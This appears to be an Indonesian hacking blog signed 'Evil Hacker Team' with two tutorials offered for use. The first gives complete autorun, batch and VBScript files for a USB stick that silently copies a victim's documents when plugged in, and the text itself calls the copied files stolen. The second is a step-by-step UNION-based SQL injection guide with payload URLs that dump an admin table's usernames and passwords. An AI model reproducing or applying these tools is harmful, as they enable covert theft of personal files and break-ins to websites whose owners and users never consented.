Mengambil Data Dengan Flashdisk

Langsung saja kita ke tutorial nya.


[ Step 1 ]

Buka Notepad copy dan paste kode dibawah ini.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Kemudian simpanlah di flashdisk dengan nama: autorun.inf (boleh diganti dengan nama lain)

[ Step 2 ]

Buka Notepad lagi dan copas kode berikut:

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls

Simpan di flashdisk anda dengan nama yg kalian Buat: file.bat

[ Step 3 ]

Buka Notepad lagi dan copas kode berikut:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Simpan di flashdisk anda dengan nama: invisible.vbs

[ Step 4 ]

Buka Notepad lagi dan copas lagi kode berikut:

wscript.exe \invisible.vbs file.bat

Simpan di flashdisk anda dengan nama: launch.bat

[ Step 5 ]

buatlah folder baru dengan nama all. untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah:

%backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”,

akan menyalin semua file ber-ekstensi ( .doc kedalam folder “all/doc” ) yang berada di flashdisk kita secara otomatis. waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

"Done"

Sekian buat tutorial mengambil data dengan flashdisk

mohon maaf kalau ada salah penulisan atau kata.

Salam dari [ Evil Hacker Team ]

Wassalamualaikum Wr Wb

SQL Injection Manual

SQL Injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang di dalamnya menggunakan database untuk penyimpanan data.


[ Step 1 ]


Carilah target
Misal: www.contoh.com/berita.php?id=100

Tambahkan karakter ( ' ) pada akhir url atau menambahkan karakter ( - ) untuk melihat apakah ada pesan error.

Contoh: www.contoh.com/berita.php?id=100' Atau www.contoh.com/berita.php?id=-100


[ Step 2 ]


Mencari dan menghitung jumlah table yang ada dalam database nya.

Gunakan perintah: +order+by

Contoh: www.contoh.com/berita.php?id=-100+order+by+1-- Atau www.contoh.com/berita.php?id=-100+order+by+1/*

Cek secara step by step.
Misal:
www.contoh.com/berita.php?id=-100+order+by+1--
www.contoh.com/berita.php?id=-100+order+by+2--
www.contoh.com/berita.php?id=-100+order+by+3--
www.contoh.com/berita.php?id=-100+order+by+4--

Sehingga muncul pesan error atau syntax error.

Misal: www.contoh.com/berita.php?id=-100+order+by+9--

Berarti yang kita ambil adalah sampai Angka 8.

Menjadi: www.contoh.com/berita.php?id=-100+order+by+8--


[ Step 3 ]


Untuk mengeluarkan angka berapa yang muncul gunakan perintah +union+select.

Karena tadi error sampai angka 9 maka.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Ok seumpama yang keluar angka 5

Gunakan perintah ( version() Atau @@version ) untuk mengecek versi SQL yang di pakai, masukan perintah tersebut pada yang keluar tadi.

Misal: www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8--
Atau
www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Lihat versi yang di gunakan, seumpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan columns yang ada pada web tersebut karena tidak bisa menggunakan perintah.
From+information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan columns seperti versi 4 karena di versi 5 ini bisa menggunakan perintah.
From+information_schema..


[ Step 4 ]


Untuk menampilkan table yang ada pada web tersebut adalah perintah ( table_name ) dimasukan pada angka yang keluar tadi,
Perintah ( +from+information_schema.tables-- ) dimasukan setelah angka terakhir.

Contoh: www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Seumpama table yang muncul adalah
"admin"


[ Step 5 ]


Untuk menampilkan semua isi dari table tersebut adalah perintah group_concat ( table_name ) dimasukan pada angka yang keluar tadi perintah.

+from+information_schema.tables+where+table_schema=database()

dimasukan setelah angka terakhir.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,group_concat (table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


[ Step 6 ]


Perintah: group_concat (columns_name) dimasukan pada angka yang keluar tadi,

Perintah: +from+information_schema.columns+where+tables_name=0xhexa--

Dimasukan setelah angka terakhir.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,group_concat (table_name),6,7,8+from+information_schema.columns+where+tables_name=0xhexa--

Pada tahap ini kamu wajib meng extrak kata pada isi table menjadi ( hexadecimal ) yaitu dengan cara mengkonversinya, website yang digunakan untuk konversi.

http://piclist.com/techref/ascii.htm
http://www.industrialtrainer.com/Unicode.shtm
http://www.dolcavie.com/js/converter.html
http://centricle.com/tools/ascii-hex/
( dan lain sebagainya )

Contoh kata yang ingin di konversi yaitu admin maka menjadi 61646D696E.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,group_concat (table_name),6,7,8+from+information_schema.columns+where+tables_name=0x61646D696E--


[ Step 7 ]


Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara.

Perintah: concat_ws ( 0x3a,hasil isi colums yang ingin di keluarkan ) dimasukan pada angka yang keluar tadi,
Perintah: +from+(nama table berasal) dimasukan setelah angka terakhir.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil columns),6,7,8+from+(nama table berasal)--

Contoh kata yang keluar adalah id, username, password.

www.contoh.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--


[ Step 8 ]


Tahap terakhir mencari halaman admin atau login,

Selanjutnya terserah anda karena kekuasaan web ada di tangan anda.


Sekian buat tutorial SQL Manual.

Mohon maaf kalau ada salah penulisan atau kata.


Salam dari [ Evil Hacker Team ]


Wassalamuallaikum Wr.Wb